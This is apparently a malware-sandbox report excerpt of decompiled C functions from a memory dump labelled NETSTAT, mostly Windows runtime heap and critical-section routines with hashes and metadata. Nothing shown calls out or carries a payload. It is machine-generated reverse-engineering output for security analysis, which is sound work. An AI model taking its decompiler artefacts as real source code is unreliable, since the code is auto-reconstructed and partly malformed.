                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 795b4fc2e238b3d5c0f6e673d7772178ad9abbf8f9b92249fd8780f058547d4f
                                      • Instruction ID: db76dd0fb1e450ee3b084ed5a580ff07c07b457f2014774c6b9d945196a6dbeb
                                      • Opcode Fuzzy Hash: 795b4fc2e238b3d5c0f6e673d7772178ad9abbf8f9b92249fd8780f058547d4f
                                      • Instruction Fuzzy Hash: 0BF082B0A54259ABDB00EBB8D916E6EB3B4EF04344F144499BA05DF3C1EA34E900CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E64F2E(void* __ecx, char _a4) {
                                      				void* __esi;
                                      				void* __ebp;
                                      				void* _t17;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t21;
                                      
                                      				_t18 = __ecx;
                                      				_t21 = __ecx;
                                      				if(__ecx == 0) {
                                      					L6:
                                      					__eflags = _a4;
                                      					if(__eflags != 0) {
                                      						L8:
                                      						E02F388F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                      						L9:
                                      						return 0;
                                      					}
                                      					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                      					if(__eflags != 0) {
                                      						goto L9;
                                      					}
                                      					goto L8;
                                      				}
                                      				_t18 = __ecx + 0x30;
                                      				if(E02E8C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2e41030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                      					goto L6;
                                      				} else {
                                      					return 1;
                                      				}
                                      			}










                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 724293cfc8cf9bfdd80ae693d712437d740417b99b25b46af3659fe89ae4a887
                                      • Instruction ID: cfd1d2cdf9feeaaf086b7a08c8672d84d42a7944ef5db711a0a458eff0af6319
                                      • Opcode Fuzzy Hash: 724293cfc8cf9bfdd80ae693d712437d740417b99b25b46af3659fe89ae4a887
                                      • Instruction Fuzzy Hash: FCF0BE325A2794CFD771D798C364B22B7E4AB007BCF24F569E40987920E724EC81C640
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 36%
                                      			E02F38CD6(intOrPtr __ecx) {
                                      				signed int _v8;
                                      				intOrPtr _v12;
                                      				short _v38;
                                      				char _v44;
                                      				signed char* _t11;
                                      				intOrPtr _t17;
                                      				intOrPtr _t22;
                                      				intOrPtr _t23;
                                      				intOrPtr _t24;
                                      				signed int _t25;
                                      
                                      				_v8 =  *0x2f5d360 ^ _t25;
                                      				_v12 = __ecx;
                                      				_v38 = 0x1c2d;
                                      				if(E02E87D50() == 0) {
                                      					_t11 = 0x7ffe0386;
                                      				} else {
                                      					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                      				}
                                      				_push( &_v44);
                                      				_push(0xffffffe4);
                                      				_push(0x402);
                                      				_push( *_t11 & 0x000000ff);
                                      				return E02EAB640(E02EA9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                      			}














                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8e4583dc2b2afc65cc50897889fe87efb3a104e7252a3b50190a3c84837d138
                                      • Instruction ID: b2210fa60c625d06084b3dea6ef186f0c05630add51467c7aac9f4ea824aca8d
                                      • Opcode Fuzzy Hash: e8e4583dc2b2afc65cc50897889fe87efb3a104e7252a3b50190a3c84837d138
                                      • Instruction Fuzzy Hash: 35F0E270A44208ABCB00EBB8D945E6EB7B4EF09340F104199F916EB2C0EA34E900CB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 88%
                                      			E02E8746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                      				signed int _t8;
                                      				void* _t10;
                                      				short* _t17;
                                      				void* _t19;
                                      				intOrPtr _t20;
                                      				void* _t21;
                                      
                                      				_t20 = __esi;
                                      				_t19 = __edi;
                                      				_t17 = __ebx;
                                      				if( *((char*)(_t21 - 0x25)) != 0) {
                                      					if(__ecx == 0) {
                                      						E02E7EB70(__ecx, 0x2f579a0);
                                      					} else {
                                      						asm("lock xadd [ecx], eax");
                                      						if((_t8 | 0xffffffff) == 0) {
                                      							_push( *((intOrPtr*)(__ecx + 4)));
                                      							E02EA95D0();
                                      							L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                      							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                      							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                      						}
                                      					}
                                      					L10:
                                      				}
                                      				_t10 = _t19 + _t19;
                                      				if(_t20 >= _t10) {
                                      					if(_t19 != 0) {
                                      						 *_t17 = 0;
                                      						return 0;
                                      					}
                                      				}
                                      				return _t10;
                                      				goto L10;
                                      			}










                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ba103b0667ae3d589ceab1e1ba01e33a22cbf044196b8b92276caf3859d42644
                                      • Instruction ID: c7587a468ce2f5d1b10866077e235f076aec8b94d87fe24d722686ba711dcd69
                                      • Opcode Fuzzy Hash: ba103b0667ae3d589ceab1e1ba01e33a22cbf044196b8b92276caf3859d42644
                                      • Instruction Fuzzy Hash: 21F0B438DC0148AADF11B7A8C940BB9FBA2AF04398F24E156E8DDAB150E7659801CB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E9A44B(signed int __ecx) {
                                      				intOrPtr _t13;
                                      				signed int _t15;
                                      				signed int* _t16;
                                      				signed int* _t17;
                                      
                                      				_t13 =  *0x2f57b9c; // 0x0
                                      				_t15 = __ecx;
                                      				_t16 = L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                      				if(_t16 == 0) {
                                      					return 0;
                                      				}
                                      				 *_t16 = _t15;
                                      				_t17 =  &(_t16[2]);
                                      				E02EAFA60(_t17, 0, _t15 << 2);
                                      				return _t17;
                                      			}








                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 79%
                                      			E02E6F358(void* __ecx, signed int __edx) {
                                      				char _v8;
                                      				signed int _t9;
                                      				void* _t20;
                                      
                                      				_push(__ecx);
                                      				_t9 = 2;
                                      				_t20 = 0;
                                      				if(E02E9F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                      					_t20 = L02E84620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                      				}
                                      				return _t20;
                                      			}







                                      C-Code - Quality: 100%
                                      			E02E7FF60(intOrPtr _a4) {
                                      				void* __ecx;
                                      				void* __ebp;
                                      				void* _t13;
                                      				intOrPtr _t14;
                                      				void* _t15;
                                      				void* _t16;
                                      				void* _t17;
                                      
                                      				_t14 = _a4;
                                      				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2e411a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                      					return E02F388F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                      				} else {
                                      					return E02E80050(_t14);
                                      				}
                                      			}











                                      C-Code - Quality: 100%
                                      			E02F1D380(void* __ecx, void* __edx, intOrPtr _a4) {
                                      				void* _t5;
                                      
                                      				if(_a4 != 0) {
                                      					_t5 = L02E6E8B0(__ecx, _a4, 0xfff);
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                      					return _t5;
                                      				}
                                      				return 0xc000000d;
                                      			}





                                      C-Code - Quality: 82%
                                      			E02EF41E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                      				void* _t5;
                                      				void* _t14;
                                      
                                      				_push(8);
                                      				_push(0x2f408f0);
                                      				_t5 = E02EBD08C(__ebx, __edi, __esi);
                                      				if( *0x2f587ec == 0) {
                                      					E02E7EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                      					if( *0x2f587ec == 0) {
                                      						 *0x2f587f0 = 0x2f587ec;
                                      						 *0x2f587ec = 0x2f587ec;
                                      						 *0x2f587e8 = 0x2f587e4;
                                      						 *0x2f587e4 = 0x2f587e4;
                                      					}
                                      					 *(_t14 - 4) = 0xfffffffe;
                                      					_t5 = L02EF4248();
                                      				}
                                      				return E02EBD0D1(_t5);
                                      			}






                                      C-Code - Quality: 100%
                                      			E02E9A185() {
                                      				void* __ecx;
                                      				intOrPtr* _t5;
                                      
                                      				if( *0x2f567e4 >= 0xa) {
                                      					if(_t5 < 0x2f56800 || _t5 >= 0x2f56900) {
                                      						return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                      					} else {
                                      						goto L1;
                                      					}
                                      				} else {
                                      					L1:
                                      					return E02E80010(0x2f567e0, _t5);
                                      				}
                                      			}






                                      C-Code - Quality: 100%
                                      			E02E916E0(void* __edx, void* __eflags) {
                                      				void* __ecx;
                                      				void* _t3;
                                      
                                      				_t3 = E02E91710(0x2f567e0);
                                      				if(_t3 == 0) {
                                      					_t6 =  *[fs:0x30];
                                      					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                      						goto L1;
                                      					} else {
                                      						return L02E84620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                      					}
                                      				} else {
                                      					L1:
                                      					return _t3;
                                      				}
                                      			}






                                      C-Code - Quality: 100%
                                      			E02EE53CA(void* __ebx) {
                                      				intOrPtr _t7;
                                      				void* _t13;
                                      				void* _t14;
                                      				intOrPtr _t15;
                                      				void* _t16;
                                      
                                      				_t13 = __ebx;
                                      				if( *((char*)(_t16 - 0x65)) != 0) {
                                      					E02E7EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                      					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                      				}
                                      				if(_t15 != 0) {
                                      					L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                      					return  *((intOrPtr*)(_t16 - 0x64));
                                      				}
                                      				return _t7;
                                      			}









                                      C-Code - Quality: 100%
                                      			E02E7AAB0() {
                                      				intOrPtr* _t4;
                                      
                                      				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                      				if(_t4 != 0) {
                                      					if( *_t4 == 0) {
                                      						goto L1;
                                      					} else {
                                      						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                                      					}
                                      				} else {
                                      					L1:
                                      					return 0x7ffe0030;
                                      				}
                                      			}





                                      C-Code - Quality: 100%
                                      			E02E935A1(void* __eax, void* __ebx, void* __ecx) {
                                      				void* _t6;
                                      				void* _t10;
                                      				void* _t11;
                                      
                                      				_t10 = __ecx;
                                      				_t6 = __eax;
                                      				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                                      					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                                      				}
                                      				if( *((char*)(_t11 - 0x1a)) != 0) {
                                      					return E02E7EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      				}
                                      				return _t6;
                                      			}







                                      C-Code - Quality: 100%
                                      			E02E6DB40() {
                                      				signed int* _t3;
                                      				void* _t5;
                                      
                                      				_t3 = L02E84620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                                      				if(_t3 == 0) {
                                      					return 0;
                                      				} else {
                                      					 *_t3 =  *_t3 | 0x00000400;
                                      					return _t3;
                                      				}
                                      			}






                                      C-Code - Quality: 100%
                                      			E02EEA537(intOrPtr _a4, intOrPtr _a8) {
                                      
                                      				return L02E88E10( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a8, _a4);
                                      			}




                                      C-Code - Quality: 100%
                                      			E02E83A1C(intOrPtr _a4) {
                                      				void* _t5;
                                      
                                      				return L02E84620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                      			}




                                      0x02e83a35

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction ID: 692e6cdea60e5bb12b064a0e2238283271b5d86375e00017e564e02692c62dfd
                                      • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                      • Instruction Fuzzy Hash: 12C08C32080248BBC7126E41DC00F017B2AE790B60F004020B6080A5A08632EC60E988
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E776E2(void* __ecx) {
                                      				void* _t5;
                                      
                                      				if(__ecx != 0 && ( *(__ecx + 0x20) & 0x00000040) == 0) {
                                      					return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                      				}
                                      				return _t5;
                                      			}




                                      0x02e776e4
                                      0x00000000
                                      0x02e776f8
                                      0x02e776fd

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction ID: 31507d695b71d61abe9f6b7d2b4f66e8ace3f4a79b27924ff9150fe0a1f6966d
                                      • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                      • Instruction Fuzzy Hash: ACC08C741C11805AEB2A6748CE20B20B650AB0870DF58619CBB49094A1C369A823C608
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E936CC(void* __ecx) {
                                      
                                      				if(__ecx > 0x7fffffff) {
                                      					return 0;
                                      				} else {
                                      					return L02E84620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, __ecx);
                                      				}
                                      			}




                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction ID: e97eb802df2afa8b1154d6cdbbd731ad9884280a90c361f9cb2a9f1afe6c0f84
                                      • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                      • Instruction Fuzzy Hash: 7CC02BB01D0440BFDB256F30CD00F147354F700B21F6403D47224454F0E7389C00E500
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E6AD30(intOrPtr _a4) {
                                      
                                      				return L02E877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                      			}



                                      0x02e6ad49

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction ID: 6f530d27a1f02d9b343435fee9f7c9a5ae14ed1da4a6d8932bbef6535e3858f3
                                      • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                      • Instruction Fuzzy Hash: 3EC08C320C0248BBC7126A45CD00F01BB2AE790B60F104020B6080A6618932E860D988
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E87D50() {
                                      				intOrPtr* _t3;
                                      
                                      				_t3 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                      				if(_t3 != 0) {
                                      					return  *_t3;
                                      				} else {
                                      					return _t3;
                                      				}
                                      			}





                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction ID: 2b3bb25dc5665ef0f3538a69b759c967c16e9678846f210f2cda6f3be2c09bc2
                                      • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                      • Instruction Fuzzy Hash: 49B092383519408FCE16EF18C080B1573E4BB46A44B9440D0E408CBA60E329E8008900
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E02E92ACB() {
                                      				void* _t5;
                                      
                                      				return E02E7EB70(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                      			}




                                      0x02e92adc

                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction ID: 93e8925a03c301542fbdf7aa0e8c463e3a01d2b273eba060ecc9d0e13da53659
                                      • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                      • Instruction Fuzzy Hash: 38B01232C50440CFCF12EF40CA20B197772FB00750F0984D1A00127930C228AC01CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 53%
                                      			E02EFFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                      				void* _t7;
                                      				intOrPtr _t9;
                                      				intOrPtr _t10;
                                      				intOrPtr* _t12;
                                      				intOrPtr* _t13;
                                      				intOrPtr _t14;
                                      				intOrPtr* _t15;
                                      
                                      				_t13 = __edx;
                                      				_push(_a4);
                                      				_t14 =  *[fs:0x18];
                                      				_t15 = _t12;
                                      				_t7 = E02EACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                      				_push(_t13);
                                      				E02EF5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                      				_t9 =  *_t15;
                                      				if(_t9 == 0xffffffff) {
                                      					_t10 = 0;
                                      				} else {
                                      					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                      				}
                                      				_push(_t10);
                                      				_push(_t15);
                                      				_push( *((intOrPtr*)(_t15 + 0xc)));
                                      				_push( *((intOrPtr*)(_t14 + 0x24)));
                                      				return E02EF5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                      			}











                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02EFFDFA
                                      Strings
                                      • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 02EFFE2B
                                      • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 02EFFE01
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.542880884.0000000002E40000.00000040.00000001.sdmp, Offset: 02E40000, based on PE: true
                                      • Associated: 00000013.00000002.543041502.0000000002F5B000.00000040.00000001.sdmp
                                      • Associated: 00000013.00000002.543055140.0000000002F5F000.00000040.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_2e40000_NETSTAT.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                      • API String ID: 885266447-3903918235
                                      • Opcode ID: fc01947a88a909c636071b7001bf8651beca0271a6406484b44a95f1c6bb7d4c
                                      • Instruction ID: 1dd5ebc54a152aa292aa9ed25a74a259c783f11b23300159d5f5a91f892e1236
                                      • Opcode Fuzzy Hash: fc01947a88a909c636071b7001bf8651beca0271a6406484b44a95f1c6bb7d4c
                                      • Instruction Fuzzy Hash: DFF0F632680601BFE6601A55DC02F63BF5BEB44730F249315FB285A5D1EAA2F8208AF0
                                      Uniqueness

                                      Uniqueness Score: -1.00%